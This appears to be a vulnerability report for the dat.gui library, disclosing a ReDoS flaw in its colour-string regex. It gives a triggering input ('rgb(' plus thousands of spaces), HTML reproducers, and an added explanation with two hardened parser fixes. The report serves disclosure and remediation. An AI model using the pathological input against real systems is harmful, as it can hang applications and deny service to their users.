Type of Issue
Potential Regex Denial of Service (ReDoS)

Description
The vulnerable regular expression is located in
dat.gui/src/dat/color/interpret.js, line 61 in 51d1a37
dat.gui/src/dat/color/interpret.js, line 79 in 51d1a37

The ReDoS vulnerability of the regex is mainly due to the sub-pattern `\s*(.+)\s*` and can be exploited with the following string: `"rgb(" + " " * 5000`
You can execute the following code to reproduce the ReDoS:
```html
<script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
  var gui = new dat.gui.GUI();
  var Options = function() {
    this.color0 = "rgb( "; // CSS string
  };
  window.onload = function() {
    var options = new Options();
    gui.addColor(options, 'color0');
  };
</script>
```

```html
<script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
  var gui = new dat.gui.GUI();
  var Options = function() {
    this.color0 = "rgba( "; // CSS string
  };
  window.onload = function() {
    var options = new Options();
    gui.addColor(options, 'color0');
  };
</script>
```
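The following is an added example and is not code from the issue or from dat.gui. It shows why the `\s*(.+)\s*` sub-pattern backtracks catastrophically and two ways a maintainer could remove the problem: making the quantified classes in the regex mutually exclusive, or replacing the regex with a length-capped split-and-trim parser. The `AMBIGUOUS_RGB` constant is an assumed reconstruction of the affected expression's shape from the sub-pattern the issue names, not a copy of the regex in interpret.js; `MAX_COLOR_STRING` and the function names are choices made for this example.

```javascript
// Added example, not dat.gui code. Contrasts a pattern of the shape the issue
// describes with two hardened CSS rgb()/rgba() parsers that cannot be driven
// into catastrophic backtracking.

// ASSUMED shape of the affected expression, reconstructed from the issue's
// description of the \s*(.+)\s* sub-pattern; not copied from interpret.js.
// The defect: each \s* overlaps with the .+ beside it, so when the expected
// "," or ")" never arrives the engine retries every way of dividing the
// whitespace between them before failing (quadratic or worse in input size).
const AMBIGUOUS_RGB = /^rgb\(\s*(.+)\s*,\s*(.+)\s*,\s*(.+)\s*\)/;

function parseWithAmbiguousRegex(str) {
  const m = AMBIGUOUS_RGB.exec(str);
  return m ? { r: parseFloat(m[1]), g: parseFloat(m[2]), b: parseFloat(m[3]) } : null;
}

// Fix 1: same structure, but the capture class excludes everything its
// neighbours can match (whitespace, "," and ")"), so no two adjacent
// quantifiers compete for the same character. Failure is now linear.
const FIXED_RGB = /^rgb\(\s*([^\s,)]+)\s*,\s*([^\s,)]+)\s*,\s*([^\s,)]+)\s*\)/;

function parseWithFixedRegex(str) {
  const m = FIXED_RGB.exec(str);
  return m ? { r: parseFloat(m[1]), g: parseFloat(m[2]), b: parseFloat(m[3]) } : null;
}

// Fix 2: drop the per-channel regex entirely. An input-length ceiling rejects
// oversized strings before any matching, and the only regex left uses a class
// ("[^()]*") that can never match the delimiters around it. Splitting on ","
// and trimming is a plain linear pass.
const MAX_COLOR_STRING = 64; // example value; a well-formed rgba() is far shorter

function parseCssRgb(str) {
  if (typeof str !== 'string' || str.length > MAX_COLOR_STRING) return null;
  const m = /^(rgba?)\(([^()]*)\)$/.exec(str);
  if (m === null) return null;
  const parts = m[2].split(',').map(s => s.trim());
  const expected = m[1] === 'rgb' ? 3 : 4;
  if (parts.length !== expected || parts.some(p => p === '')) return null;
  const nums = parts.map(Number);
  if (nums.some(n => !Number.isFinite(n))) return null;
  const [r, g, b, a] = nums;
  return expected === 3 ? { r, g, b } : { r, g, b, a };
}

// Agreement check on well-formed input: the hardened parsers must return the
// same channels as the ambiguous one, so either is a drop-in for valid colours.
function sameResult(str) {
  const reference = JSON.stringify(parseWithAmbiguousRegex(str));
  return reference === JSON.stringify(parseWithFixedRegex(str)) &&
         reference === JSON.stringify(parseCssRgb(str));
}

// Demo. The ambiguous pattern is deliberately NOT run on the pathological
// string here; only the hardened parsers are, and both reject it immediately.
const demoGood = 'rgb( 255 , 128 , 0 )';
const demoPathological = 'rgb(' + ' '.repeat(5000); // the issue's "rgb(" + " " * 5000
console.log(parseCssRgb(demoGood), sameResult(demoGood));
console.log(parseWithFixedRegex(demoPathological), parseCssRgb(demoPathological));
```

Of the two fixes, the first is the smaller patch for a code base that wants to keep its regex table; the second is what a reviewer would prefer for new code, because a parser with no overlapping quantifiers and an explicit length bound stays safe when someone later edits the pattern.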